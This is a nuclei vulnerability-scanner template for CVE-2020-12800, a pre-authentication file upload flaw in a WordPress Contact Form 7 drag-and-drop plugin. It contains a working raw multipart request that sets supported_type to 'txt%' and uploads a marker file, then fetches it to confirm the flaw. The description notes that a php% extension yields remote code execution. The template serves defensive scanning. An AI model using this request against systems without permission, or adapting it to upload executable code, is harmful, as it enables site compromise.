nuclei-templates/cves/2020/CVE-2020-12800.yaml

60 lines
1.9 KiB
YAML

id: CVE-2020-12800
info:
name: WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE
author: dwisiswant0
severity: critical
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
reference: https://github.com/amartinsec/CVE-2020-12800
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601
X-Requested-With: XMLHttpRequest
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="supported_type"
txt%
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="size_limit"
5242880
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="action"
dnd_codedropz_upload
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="type"
click
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%"
Content-Type: application/x-httpd-php
CVE-2020-12800-{{randstr}}
-----------------------------350278735926454076983690555601--
- |
GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "CVE-2020-12800-{{randstr}}"
- type: word
part: header
words:
- "text/plain"